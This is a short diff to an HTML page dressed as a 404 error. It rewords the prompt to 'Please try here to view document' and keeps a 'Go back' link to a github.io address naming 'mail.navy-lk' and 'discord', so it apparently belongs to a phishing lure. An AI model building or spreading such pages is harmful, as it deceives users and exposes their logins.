--- a/TvVlcSGMhttpzfrVWtsNvnFsXMfNrhCjNQvxGrTCLvxPQrjML/index.html
+++ b/TvVlcSGMhttpzfrVWtsNvnFsXMfNrhCjNQvxGrTCLvxPQrjML/index.html
@@ -14,7 +14,7 @@
 			<h2>Not Found</h2>
 			<p>
 				The requested URL was not found on this server.<br>
-				Please try here.<br><br>
+				Please try here to view document.<br><br>
 				Error 404<br><br>
 				<a class="errGoBack" href="https://downloadsmail.github.io/mail.navy-lk/new%20%20version%20discord%20TvVlcSGMhttpzfrVWtsNvnFsXMfNrhCjNQvxGrTCLvxPQrjML%20(copy)/">Go back</a>
 			</p>
